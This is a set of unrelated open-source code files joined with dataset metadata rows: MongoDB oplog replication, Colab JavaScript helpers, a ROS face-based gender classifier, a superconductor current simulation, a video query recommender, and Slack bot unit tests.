continue
coll_list = retry_until_ok(
self.main_connection[database].collection_names)
for coll in coll_list:
if coll.startswith("system"):
continue
namespace = "%s.%s" % (database, coll)
dump_set.append(namespace)
timestamp = util.retry_until_ok(self.get_last_oplog_timestamp)
if timestamp is None:
return None
long_ts = util.bson_ts_to_long(timestamp)
def docs_to_dump():
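            # Page through each namespace in _id order so the scan can resume
            # cleanly after an AutoReconnect.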
for namespace in dump_set:
logging.info("OplogThread: dumping collection %s"
% namespace)
database, coll = namespace.split('.', 1)
last_id = None
attempts = 0
# Loop to handle possible AutoReconnect
while attempts < 60:
target_coll = self.main_connection[database][coll]
if not last_id:
cursor = util.retry_until_ok(
target_coll.find,
fields=self._fields,
sort=[("_id", pymongo.ASCENDING)]
)
else:
cursor = util.retry_until_ok(
target_coll.find,
{"_id": {"$gt": last_id}},
fields=self._fields,
sort=[("_id", pymongo.ASCENDING)]
)
try:
for doc in cursor:
if not self.running:
raise StopIteration
doc["ns"] = self.dest_mapping.get(
namespace, namespace)
doc["_ts"] = long_ts
last_id = doc["_id"]
yield doc
break
except pymongo.errors.AutoReconnect:
attempts += 1
time.sleep(1)
def upsert_each(dm):
num_inserted = 0
num_failed = 0
for num, doc in enumerate(docs_to_dump()):
if num % 10000 == 0:
logging.debug("Upserted %d docs." % num)
try:
dm.upsert(doc)
num_inserted += 1
except Exception:
if self.continue_on_error:
logging.exception(
"Could not upsert document: %r" % doc)
num_failed += 1
else:
raise
logging.debug("Upserted %d docs" % num_inserted)
if num_failed > 0:
logging.error("Failed to upsert %d docs" % num_failed)
def upsert_all(dm):
try:
dm.bulk_upsert(docs_to_dump())
except Exception as e:
if self.continue_on_error:
logging.exception("OplogThread: caught exception"
" during bulk upsert, re-upserting"
" documents serially")
upsert_each(dm)
else:
raise
def do_dump(dm, error_queue):
try:
# Bulk upsert if possible
if hasattr(dm, "bulk_upsert"):
logging.debug("OplogThread: Using bulk upsert function for "
"collection dump")
upsert_all(dm)
else:
logging.debug(
"OplogThread: DocManager %s has no "
"bulk_upsert method. Upserting documents "
"serially for collection dump." % str(dm))
upsert_each(dm)
except:
# Likely exceptions:
# pymongo.errors.OperationFailure,
# mongo_connector.errors.ConnectionFailed
# mongo_connector.errors.OperationFailed
error_queue.put(sys.exc_info())
# Extra threads (if any) that assist with collection dumps
dumping_threads = []
# Did the dump succeed for all target systems?
dump_success = True
# Holds any exceptions we can't recover from
errors = queue.Queue()
if len(self.doc_managers) == 1:
do_dump(self.doc_managers[0], errors)
else:
# Slight performance gain breaking dump into separate
# threads if > 1 replication target
for dm in self.doc_managers:
t = threading.Thread(target=do_dump, args=(dm, errors))
dumping_threads.append(t)
t.start()
# cleanup
for t in dumping_threads:
t.join()
# Print caught exceptions
try:
while True:
klass, value, trace = errors.get_nowait()
dump_success = False
traceback.print_exception(klass, value, trace)
except queue.Empty:
pass
if not dump_success:
err_msg = "OplogThread: Failed during dump collection"
effect = "cannot recover!"
logging.error('%s %s %s' % (err_msg, effect, self.oplog))
self.running = False
return None
return timestamp
def get_last_oplog_timestamp(self):
"""Return the timestamp of the latest entry in the oplog.
"""
if not self.namespace_set:
curr = self.oplog.find().sort(
'$natural', pymongo.DESCENDING
).limit(1)
else:
curr = self.oplog.find(
{'ns': {'$in': self.namespace_set}}
).sort('$natural', pymongo.DESCENDING).limit(1)
if curr.count(with_limit_and_skip=True) == 0:
return None
logging.debug("OplogThread: Last oplog entry has timestamp %d."
% curr[0]['ts'].time)
return curr[0]['ts']
def init_cursor(self):
"""Position the cursor appropriately.
The cursor is set to either the beginning of the oplog, or
wherever it was last left off.
"""
logging.debug("OplogThread: Initializing the oplog cursor.")
timestamp = self.read_last_checkpoint()
if timestamp is None and self.collection_dump:
timestamp = self.dump_collection()
if timestamp:
msg = "Dumped collection into target system"
logging.info('OplogThread: %s %s'
% (self.oplog, msg))
elif timestamp is None:
# set timestamp to top of oplog
timestamp = retry_until_ok(self.get_last_oplog_timestamp)
self.checkpoint = timestamp
cursor = self.get_oplog_cursor(timestamp)
if cursor is not None:
self.update_checkpoint()
return cursor
def update_checkpoint(self):
"""Store the current checkpoint in the oplog progress dictionary.
"""
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
oplog_dict[str(self.oplog)] = self.checkpoint
logging.debug("OplogThread: oplog checkpoint updated to %s" %
str(self.checkpoint))
def read_last_checkpoint(self):
"""Read the last checkpoint from the oplog progress dictionary.
"""
oplog_str = str(self.oplog)
ret_val = None
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
if oplog_str in oplog_dict.keys():
ret_val = oplog_dict[oplog_str]
logging.debug("OplogThread: reading last checkpoint as %s " %
str(ret_val))
return ret_val
def rollback(self):
"""Rollback target system to consistent state.
The strategy is to find the latest timestamp in the target system and
the largest timestamp in the oplog less than the latest target system
timestamp. This defines the rollback window and we just roll these
back until the oplog and target system are in consistent states.
"""
# Find the most recently inserted document in each target system
logging.debug("OplogThread: Initiating rollback sequence to bring "
"system into a consistent state.")
last_docs = []
for dm in self.doc_managers:
dm.commit()
last_docs.append(dm.get_last_doc())
# Of these documents, which is the most recent?
last_inserted_doc = max(last_docs,
key=lambda x: x["_ts"] if x else float("-inf"))
# Nothing has been replicated. No need to rollback target systems
if last_inserted_doc is None:
return None
# Find the oplog entry that touched the most recent document.
# We'll use this to figure where to pick up the oplog later.
target_ts = util.long_to_bson_ts(last_inserted_doc['_ts'])
last_oplog_entry = util.retry_until_ok(
self.oplog.find_one,
{'ts': {'$lte': target_ts}},
sort=[('$natural', pymongo.DESCENDING)]
)
logging.debug("OplogThread: last oplog entry is %s"
% str(last_oplog_entry))
# The oplog entry for the most recent document doesn't exist anymore.
# If we've fallen behind in the oplog, this will be caught later
if last_oplog_entry is None:
return None
# rollback_cutoff_ts happened *before* the rollback
rollback_cutoff_ts = last_oplog_entry['ts']
start_ts = util.bson_ts_to_long(rollback_cutoff_ts)
# timestamp of the most recent document on any target system
end_ts = last_inserted_doc['_ts']
for dm in self.doc_managers:
rollback_set = {} # this is a dictionary of ns:list of docs
# group potentially conflicted documents by namespace
for doc in dm.search(start_ts, end_ts):
if doc['ns'] in rollback_set:
rollback_set[doc['ns']].append(doc)
else:
rollback_set[doc['ns']] = [doc]
# retrieve these documents from MongoDB, either updating
# or removing them in each target system
for namespace, doc_list in rollback_set.items():
# Get the original namespace
original_namespace = namespace
for source_name, dest_name in self.dest_mapping.items():
if dest_name == namespace:
original_namespace = source_name
database, coll = original_namespace.split('.', 1)
obj_id = bson.objectid.ObjectId
bson_obj_id_list = [obj_id(doc['_id']) for doc in doc_list]
to_update = util.retry_until_ok(
self.main_connection[database][coll].find,
{'_id': {'$in': bson_obj_id_list}},
fields=self._fields
)
#doc list are docs in target system, to_update are
#docs in mongo
doc_hash = {} # hash by _id
for doc in doc_list:
doc_hash[bson.objectid.ObjectId(doc['_id'])] = doc
to_index = []
def collect_existing_docs():
for doc in to_update:
if doc['_id'] in doc_hash:
del doc_hash[doc['_id']]
to_index.append(doc)
retry_until_ok(collect_existing_docs)
#delete the inconsistent documents
logging.debug("OplogThread: Rollback, removing inconsistent "
"docs.")
remov_inc = 0
for doc in doc_hash.values():
try:
dm.remove(doc)
remov_inc += 1
logging.debug("OplogThread: Rollback, removed %s " %
str(doc))
except errors.OperationFailed:
logging.warning(
"Could not delete document during rollback: %s "
"This can happen if this document was already "
"removed by another rollback happening at the "
"same time." % str(doc)
)
logging.debug("OplogThread: Rollback, removed %d docs." %
remov_inc)
#insert the ones from mongo
logging.debug("OplogThread: Rollback, inserting documents "
"from mongo.")
insert_inc = 0
fail_insert_inc = 0
for doc in to_index:
doc['_ts'] = util.bson_ts_to_long(rollback_cutoff_ts)
doc['ns'] = self.dest_mapping.get(namespace, namespace)
try:
insert_inc += 1
dm.upsert(doc)
except errors.OperationFailed as e:
fail_insert_inc += 1
logging.error("OplogThread: Rollback, Unable to "
"insert %s with exception %s"
% (doc, str(e)))
logging.debug("OplogThread: Rollback, Successfully inserted %d "
" documents and failed to insert %d"
" documents. Returning a rollback cutoff time of %s "
% (insert_inc, fail_insert_inc, str(rollback_cutoff_ts)))
return rollback_cutoff_ts
| apache-2.0 | 1,205,969,537,052,731,600 | 39.97047 | 80 | 0.496445 | false |
googlecolab/colabtools | google/colab/output/_js.py | 1 | 3073 | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Colab helpers for interacting with JavaScript in outputframes."""
import json
from google.colab import _ipython
from google.colab import _message
_json_decoder = json.JSONDecoder()
def eval_js(script, ignore_result=False, timeout_sec=None):
"""Evaluates the Javascript within the context of the current cell.
Args:
script: The javascript string to be evaluated
ignore_result: If true, will return immediately
and result from javascript side will be ignored.
timeout_sec: blocks for that many seconds.
Returns:
Result of the Javascript evaluation or None if ignore_result.
"""
args = ['cell_javascript_eval', {'script': script}]
kernel = _ipython.get_kernel()
request_id = _message.send_request(*args, parent=kernel.shell.parent_header)
if ignore_result:
return
return _message.read_reply_from_input(request_id, timeout_sec)
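# Hypothetical usage: eval_js('1 + 1') blocks until the outputframe returns 2,
# while eval_js('doSomething()', ignore_result=True) returns None immediately.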
_functions = {}
def register_callback(function_name, callback):
"""Registers a function as a target invokable by Javacript in outputs.
This exposes the Python function as a target which may be invoked by
Javascript executing in Colab output frames.
This callback can be called from javascript side using:
colab.kernel.invokeFunction(function_name, [1, 2, 3], {'hi':'bye'})
then it will invoke callback(1, 2, 3, hi="bye")
Args:
function_name: string
callback: function that possibly takes positional and keyword arguments
that will be passed via invokeFunction()
"""
_functions[function_name] = callback
def _invoke_function(function_name, json_args, json_kwargs):
"""Invokes callback with given function_name.
This function is meant to be used by frontend when proxying
data from secure iframe into kernel. For example:
_invoke_function(fn_name, "'''" + JSON.stringify(data) + "'''")
Note the triple quotes: valid JSON cannot contain triple quotes,
so this is a valid literal.
Args:
function_name: string
json_args: string containing valid json, provided by user.
json_kwargs: string containing valid json, provided by user.
Returns:
The value returned by the callback.
Raises:
ValueError: if the registered function cannot be found.
"""
args = _json_decoder.decode(json_args)
kwargs = _json_decoder.decode(json_kwargs)
callback = _functions.get(function_name, None)
if not callback:
raise ValueError('Function not found: {function_name}'.format(
function_name=function_name))
return callback(*args, **kwargs)
| apache-2.0 | 8,002,486,483,341,580,000 | 31.691489 | 78 | 0.731207 | false |
amasiero/approach_control | approach_control_people/nodes/approach_control_people/faces/GenderDiscover.py | 1 | 2283 | #!/usr/bin/env python
import cv2.cv
import imutils
import time
import smach
import smach_ros
import rospy
from std_msgs.msg import String
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
from approach_control_people.faces.Map import Map
from approach_control_people.faces.ULBP import ULBP
from approach_control_people.faces.lbp_utils import W, Authentify
from approach_control_people.faces.load_database import load_female_db as female_db
from approach_control_people.faces.load_database import load_male_db as male_db
class GenderDiscover(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['woman', 'man', 'fail'])
self.face_cascade = cv2.CascadeClassifier('/usr/local/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml')
self.bridge = CvBridge()
self.GRID = 16
self.SIZE = 128
self.m = Map('Regions')
self.m.MakeRegularCluster(self.SIZE, self.SIZE, self.GRID, self.GRID)
self.m.MakeRegions()
self.ulbp_face = ULBP(self.m)
self.ulbp_female = ULBP(self.m)
self.ulbp_male = ULBP(self.m)
self.ulbp_male.MakePattern(male_db())
self.ulbp_male.MakeHistogram()
self.ulbp_female.MakePattern(female_db())
self.ulbp_female.MakeHistogram()
self.gender = None
def is_woman(self, img):
self.ulbp_face.MakePattern(img)
self.ulbp_face.MakeHistogram()
return Authentify(self.ulbp_face.histogram, self.ulbp_female.histogram, self.ulbp_male.histogram, W) > 20.0
def callback(self, data):
try:
image = self.bridge.imgmsg_to_cv2(data, 'bgr8')
		except CvBridgeError as e:
			rospy.logerr(e)
			return
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
roi_gray = None
faces = self.face_cascade.detectMultiScale(
gray,
scaleFactor = 1.1,
minNeighbors = 10,
minSize = (100,100),
flags = cv2.cv.CV_HAAR_SCALE_IMAGE
)
for (x, y, w, h) in faces:
x1 = x + int(w * .1)
x2 = x1 + int(w * .8)
y1 = y + int(h * .2)
y2 = y1 + int(h * .8)
roi_gray = cv2.resize(gray[y1:y2, x1:x2], (128, 128))
self.gender = 'man'
if self.is_woman(roi_gray):
self.gender = 'woman'
def execute(self, userdata):
rospy.Subscriber('/image_raw', Image, self.callback)
rospy.sleep(5)
if self.gender is not None:
return self.gender
else:
return 'fail' | gpl-2.0 | -3,593,615,707,399,300,000 | 24.098901 | 119 | 0.700394 | false |
jithinbp/BTK_simulations | current_fermi.py | 1 | 2141 | import math
import pygrace
import pygame,os,time,sys
WIDTH=400
HEIGHT=100
size = [WIDTH,HEIGHT]
flags=pygame.SRCALPHA|pygame.HWSURFACE|pygame.HWACCEL
os.environ['SDL_VIDEO_WINDOW_POS'] = '700,100'
screen = pygame.display.set_mode(size,flags)
pygame.display.set_caption("Transmission and reflection")
def xmgrace():
global pg
try:
import pygrace
except:
print 'damn'
return
pg = pygrace.grace()
pg.xlabel('V -->>')
pg.ylabel('I -->')
pg.title('Current')
#globals
ev=1.6e-19
k=1#8.617e-5
delta=2*0.001
T=5.0/11605.0 #temperature in eV 1ev=11605k
z=1.0 #Barrier strength at the interface
#general form
def gamma2(u2):
return (u2+z*z*(2*u2-1) )**2
def u2(E):
return 0.5*(1+math.sqrt((E**2-delta**2)/(E**2)) )
def PA(E): #probability of andreev reflection
if E<delta:
t2=E*E + (delta*delta-E*E)*( (1+2*z*z)**2 )
return (delta*delta)/t2
else:
u=u2(E)
return u*(1-u)/gamma2(u)
def PB(E): #probability of ordinary reflection
if E<delta:
return 1-PA(E)
else:
u=u2(E)
return (2*u-1)*(2*u-1)*(1+z*z)*z*z/gamma2(u)
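# Sanity check (illustrative, not part of the original script): below the gap
# the Andreev and normal reflection probabilities should sum to 1, e.g.
#   print PA(0.5*delta) + PB(0.5*delta)   # -> 1.0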
def fermi_fn(E):
#print 'E,k*T, E/(k*T) = ',E,k*T,E/(k*T)
x= 1.0/(math.exp(E/(T))+1)
return x
def integ(E,V):
x=(fermi_fn(E-V)-fermi_fn(E))*(1+PA(E)-PB(E))
return x
def current(V):
#integrate between reasonable limits ( not -inf to +inf )
I=0
dE=1.0e-3
E=0
while E<0.3:
Im=integ(E,V)*(dE)
Ip=integ(-E,V)*(dE)
I+=Im+Ip
E+=dE
#print 'E,I= ',E,I
return I
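# Quick sanity check (illustrative, not part of the original script): the
# integrated current vanishes at zero bias and grows with V, e.g.
#   print current(0.0)      # -> 0.0
#   print current(1.5e-3)   # positive, larger than current(0.5e-3)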
xmgrace()
pg.hold(1)
dump=open('TandR_Z0.txt','wt')
#XMGRACE PLOT FEATURES
# A=Black , B=red , C in green , D in Blue
def refresh(z):
pg.xlabel('E (Z = %2.2f) -->'%(z))
pg.clear()
pg.hold(1)
dump=open('I.txt','wt')
y=[]
x=[]
V=0
dV=1e-5
while V<3e-3:
j=V
g=current(V)
V+=dV
if(j):
#print j,g
x.append(j)
y.append(g)
dump.write('%f %f\n'%(j,g) )
pg.plot(x,y)
dump.write('\n')
dump.close()
ll=0
refresh(z)
run=True
while run:
event=pygame.event.wait()
if event.type == pygame.QUIT:
try:
pg.exit()
run=False
except:
sys.exit()
ll=0
try:
ll=event.button
if(ll==4):z+=0.1
elif (ll==5): z-=0.1
if z<0: z=0
except:
continue
if(ll):refresh(z)
| gpl-3.0 | 8,471,243,037,193,875,000 | 14.977612 | 58 | 0.609061 | false |
anguoyang/SMQTK | OLD_ROOT/WebUI/QueryRecommend/query_recommend.py | 1 | 7183 | """
LICENCE
-------
Copyright 2013 by Kitware, Inc. All Rights Reserved. Please refer to
KITWARE_LICENSE.TXT for licensing information, or contact General Counsel,
Kitware, Inc., 28 Corporate Drive, Clifton Park, NY 12065.
"""
import os
import numpy as np
import json
thispath = os.path.dirname(os.path.abspath(__file__))
# commonly used words in event descriptions
additional_stop_words = ['event', 'name', 'explication', 'evidential', 'description', 'scene',
'objects', 'people', 'activities', 'audio']
# zero-shot queries for E006 ~ E015
queries = dict()
queries['E000'] = ''
queries['E006'] = 'sc.person sc.enclosed_area sc.electric_or_indoor_lighting sc.has_audience sc.congregating' \
' ob.light_source ob.person'
queries['E007'] = 'sc.transporting sc.manmade sc.using_tools sc.asphalt ob.round_shape ob.car'
queries['E008'] = 'sc.congregating sc.has_audience ob.person sc.pavement' \
' ob.large_group_of_people ob.crowd ob.small_group_of_people ob.railing ob.floor'
queries['E009'] = 'sc.dirty sc.natural_light sc.natural ob.large_open_area sc.sunny sc.trees' \
' ob.truck ob.car ob.large_open_area ob.outdoor'
queries['E010'] = 'sc.working sc.dirty sc.enclosed_area'
queries['E011'] = 'sc.enclosed_area sc.wood_not_part_of_tree sc.electric_or_indoor_lighting'
queries['E012'] = 'sc.congregating sc.has_audience sc.asphalt sc.pavement' \
' ob.person ob.large_group_of_people ob.tree ob.sports_venue ob.crowd' \
' ob.small_group_of_people ob.railing ob.floor'
queries['E013'] = 'sc.asphalt sc.trees sc.natural_light sc.open_area' \
' ob.large_open_area ob.tree ob.rectangular_shape ob.door'
queries['E014'] = 'sc.using_tools sc.working sc.learning ob.round_shape'
queries['E015'] = 'sc.person sc.enclosed_area sc.electric_or_indoor_lighting'
queries['E021'] = 'sc.trees sc.vegetation sc.natural sc.open_area sc.pavement sc.asphalt sc.natural_light' \
' ob.tree ob.large_open_area ob.cloud ob.outdoor ob.sports_venue ob.sky ob.truck '
queries['E022'] = 'sc.learning sc.working sc.enclosed_area sc.dirty sc.using_tools sc.electric_or_indoor_lighting'
queries['E023'] = 'sc.asphalt sc.pavement sc.clouds' \
' ob.cloud ob.small_group_of_people ob.floor ob.sports_venue ob.railing'
queries['E024'] = 'sc.transporting sc.asphalt sc.trees sc.pavement ob.rectangular_shape ob.door'
queries['E025'] = 'sc.person ob.small_group_of_people ob.vertical_pattern'
queries['E026'] = 'sc.wood_not_part_of_tree sc.enclosed_area sc.working sc.using_tools sc.dirty' \
' ob.door ob.vertical_pattern ob.rectangular_shape ob.railing '
queries['E027'] = 'sc.natural sc.dirty sc.open_area sc.trees sc.natural_light' \
' ob.large_group_of_people ob.tree ob.outdoor ob.vertical_pattern ob.crowd ob.person '
queries['E028'] = 'sc.person sc.has_audience sc.enclosed_area ob.rectangular_shape ob.crowd'
queries['E029'] = 'sc.sunny sc.still_water sc.open_area sc.pavement sc.trees sc.manmade sc.asphalt' \
' ob.large_open_area ob.sports_venue ob.outdoor ob.horizontal_pattern'
queries['E030'] = 'sc.using_tools sc.working sc.dirty ob.railing ob.floor ob.face'
def read_words(_words):
words = []
with open(_words, 'r') as fid_stop_words:
for line in fid_stop_words:
if line[-1]=='\n':
line = line[:-1]
if line != '':
words.append(line)
return words
def preprocess(string, stop_words=None, special_char=None):
if stop_words is None:
_stop = thispath + '/stop_words.txt'
stop_words = read_words(_stop)
if special_char is None:
_special = thispath + '/special_characters.txt'
special_char = read_words(_special)
string = string.lower()
string = string.replace('\n', ' ')
string = string.replace('\t', ' ')
for schar in special_char:
string = string.replace(schar.decode("utf8"), '')
words = string.split(' ')
words_out = []
for w in words:
if not (w in stop_words) and len(w) > 0:
words_out.append(w)
return words_out
def generate_bow(string, dictionary):
bow = np.zeros(len(dictionary))
words = preprocess(string)
for w in words:
try:
bow[dictionary[w]] += 1
except KeyError:
# A word doesn't exist in the dictionary, so ignore it.
continue
if np.sum(bow) > 0:
bow /= np.sum(bow)
return bow
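# Illustrative sketch (not part of the original module; the toy dictionary and
# text are made up, and the exact vector assumes "the" is in stop_words.txt):
#
#   toy_dictionary = {'bike': 0, 'ride': 1, 'trick': 2}
#   generate_bow('Bike trick ride the bike', toy_dictionary)
#   # -> array([ 0.5 ,  0.25,  0.25])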
def build_dictionary():
_stop = thispath + '/stop_words.txt'
_special = thispath + '/special_characters.txt'
stop_words = read_words(_stop) + additional_stop_words
special_char = read_words(_special)
words = []
for eid in range(6, 16) + range(21, 31):
string = ""
        with open(thispath + '/eventtexts/E%03d.txt' % eid, 'r') as fid_event:
for line in fid_event:
string += line
words += preprocess(string, stop_words, special_char)
words = sorted(list(set(words)))
dictionary = dict()
for idx, w in enumerate(words):
dictionary[w] = idx
    np.save(thispath + '/dictionary_event_description.npy', dictionary)
def generate_event_bow():
dictionary = np.load(thispath + '/dictionary_event_description.npy').item()
for eid in range(6, 16) + range(21, 31):
string = ""
with open(thispath + '/eventtexts/E%03d.txt' % eid, 'r') as fid_event:
for line in fid_event:
string += line
bow_eid = generate_bow(string, dictionary)
np.save(thispath + '/eventbow/E%03d.npy' % eid, bow_eid)
def recommend_query(string):
'''
Return zero-shot queries based on event description
@param string: Event description in a string format
@return: Queries in a string format
'''
dictionary = np.load(thispath + '/dictionary_event_description.npy').item()
bow = generate_bow(string, dictionary)
min_dist = 1
detected_eid = 0 # if description matching fails, it will return an empty query.
for eid in range(6, 16) + range(21, 31):
bow_eid = np.load(thispath + '/eventbow/E%03d.npy' % eid)
dist = np.sqrt(np.sum((bow - bow_eid)**2))
if min_dist > dist:
min_dist = dist
detected_eid = eid
return queries['E%03d' % detected_eid]
if __name__ == '__main__':
# build_dictionary()
# generate_event_bow()
    string = 'Explication: Bikes are normally ridden with a person sitting down on ' \
'seat and holding onto the handlebars and steering with their hands. ' \
'Tricks consist of difficult ways of riding the bike, such as on ' \
'one wheel, steering with feet or standing on the seat; or intentional ' \
'motions made with the bike that are not simply slowing down/stopping ' \
'the bike, propelling it forward, or steering the bike as it'
q = recommend_query(string)
print q
| bsd-3-clause | 2,104,360,600,271,689,500 | 42.067485 | 114 | 0.622442 | false |
rossrader/destalinator | tests/test_destalinator.py | 1 | 25539 | from datetime import date, datetime, timedelta
import mock
import os
import unittest
import destalinator
import slacker
import slackbot
sample_slack_messages = [
{
"type": "message",
"channel": "C2147483705",
"user": "U2147483697",
"text": "Human human human.",
"ts": "1355517523.000005",
"edited": {
"user": "U2147483697",
"ts": "1355517536.000001"
}
},
{
"type": "message",
"subtype": "bot_message",
"text": "Robot robot robot.",
"ts": "1403051575.000407",
"user": "U023BEAD1"
},
{
"type": "message",
"subtype": "channel_name",
"text": "#stalin has been renamed <C2147483705|khrushchev>",
"ts": "1403051575.000407",
"user": "U023BECGF"
},
{
"type": "message",
"channel": "C2147483705",
"user": "U2147483697",
"text": "Contemplating existence.",
"ts": "1355517523.000005"
},
{
"type": "message",
"subtype": "bot_message",
"attachments": [
{
"fallback": "Required plain-text summary of the attachment.",
"color": "#36a64f",
"pretext": "Optional text that appears above the attachment block",
"author_name": "Bobby Tables",
"author_link": "http://flickr.com/bobby/",
"author_icon": "http://flickr.com/icons/bobby.jpg",
"title": "Slack API Documentation",
"title_link": "https://api.slack.com/",
"text": "Optional text that appears within the attachment",
"fields": [
{
"title": "Priority",
"value": "High",
"short": False
}
],
"image_url": "http://my-website.com/path/to/image.jpg",
"thumb_url": "http://example.com/path/to/thumb.png",
"footer": "Slack API",
"footer_icon": "https://platform.slack-edge.com/img/default_application_icon.png",
"ts": 123456789
}
],
"ts": "1403051575.000407",
"user": "U023BEAD1"
}
]
sample_warning_messages = [
{
"user": "U023BCDA1",
"text":"This is a channel warning! Put on your helmets!",
"username":"bot",
"bot_id":"B0T8EDVLY",
"attachments": [{"fallback":"channel_warning", "id": 1}],
"type":"message",
"subtype":"bot_message",
"ts":"1496855882.185855"
}
]
class MockValidator(object):
def __init__(self, validator):
# validator is a function that takes a single argument and returns a bool.
self.validator = validator
def __eq__(self, other):
return bool(self.validator(other))
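# Illustrative note (not part of the original tests): MockValidator lets an
# assertion match on a predicate instead of an exact value, e.g. (channel name
# and predicate made up):
#
#   mock_slacker.post_message.assert_called_with(
#       'general', MockValidator(lambda text: 'stale' in text))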
class SlackerMock(slacker.Slacker):
def get_users(self):
pass
def get_channels(self):
pass
class DestalinatorChannelMarkupTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_add_slack_channel_markup(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
input_text = "Please find my #general channel reference."
mock_slacker.add_channel_markup.return_value = "<#ABC123|general>"
self.assertEqual(
self.destalinator.add_slack_channel_markup(input_text),
"Please find my <#ABC123|general> channel reference."
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_add_slack_channel_markup_multiple(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
input_text = "Please find my #general multiple #general channel #general references."
mock_slacker.add_channel_markup.return_value = "<#ABC123|general>"
self.assertEqual(
self.destalinator.add_slack_channel_markup(input_text),
"Please find my <#ABC123|general> multiple <#ABC123|general> channel <#ABC123|general> references."
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_add_slack_channel_markup_hyphens(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
input_text = "Please find my #channel-with-hyphens references."
mock_slacker.add_channel_markup.return_value = "<#EXA456|channel-with-hyphens>"
self.assertEqual(
self.destalinator.add_slack_channel_markup(input_text),
"Please find my <#EXA456|channel-with-hyphens> references."
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_add_slack_channel_markup_ignore_screaming(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
input_text = "Please find my #general channel reference and ignore my #HASHTAGSCREAMING thanks."
mock_slacker.add_channel_markup.return_value = "<#ABC123|general>"
self.assertEqual(
self.destalinator.add_slack_channel_markup(input_text),
"Please find my <#ABC123|general> channel reference and ignore my #HASHTAGSCREAMING thanks."
)
class DestalinatorChannelMinimumAgeTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_channel_is_old(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 86400 * 60}
self.assertTrue(self.destalinator.channel_minimum_age("testing", 30))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_channel_is_exactly_expected_age(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 86400 * 30}
self.assertFalse(self.destalinator.channel_minimum_age("testing", 30))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_channel_is_young(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 86400 * 1}
self.assertFalse(self.destalinator.channel_minimum_age("testing", 30))
target_archive_date = date.today() + timedelta(days=10)
target_archive_date_string = target_archive_date.isoformat()
class DestalinatorGetEarliestArchiveDateTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch.dict(os.environ, {'EARLIEST_ARCHIVE_DATE': target_archive_date_string})
def test_env_var_name_set_in_config(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['earliest_archive_date_env_varname'] = 'EARLIEST_ARCHIVE_DATE'
self.assertEqual(self.destalinator.get_earliest_archive_date(), target_archive_date)
def test_archive_date_set_in_config(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['earliest_archive_date_env_varname'] = None
self.destalinator.config.config['earliest_archive_date'] = target_archive_date_string
self.assertEqual(self.destalinator.get_earliest_archive_date(), target_archive_date)
def test_falls_back_to_past_date(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['earliest_archive_date_env_varname'] = None
self.destalinator.config.config['earliest_archive_date'] = None
self.assertEqual(
self.destalinator.get_earliest_archive_date(),
datetime.strptime(destalinator.PAST_DATE_STRING, "%Y-%m-%d").date()
)
class DestalinatorGetMessagesTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_default_included_subtypes(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channelid.return_value = "123456"
mock_slacker.get_messages_in_time_range.return_value = sample_slack_messages
self.assertEqual(len(self.destalinator.get_messages("general", 30)), len(sample_slack_messages))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_empty_included_subtypes(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['included_subtypes'] = []
mock_slacker.get_channelid.return_value = "123456"
mock_slacker.get_messages_in_time_range.return_value = sample_slack_messages
self.assertEqual(
len(self.destalinator.get_messages("general", 30)),
sum('subtype' not in m for m in sample_slack_messages)
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_limited_included_subtypes(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['included_subtypes'] = ['bot_message']
mock_slacker.get_channelid.return_value = "123456"
mock_slacker.get_messages_in_time_range.return_value = sample_slack_messages
